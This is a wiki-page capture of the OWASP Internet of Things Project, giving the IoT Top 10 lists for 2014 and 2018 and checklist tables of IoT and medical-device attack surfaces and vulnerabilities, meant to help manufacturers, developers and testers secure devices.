<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246183OWASP Internet of Things Project2018-12-19T23:46:35Z<p>Aaron.guzman: /* Philosophy */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
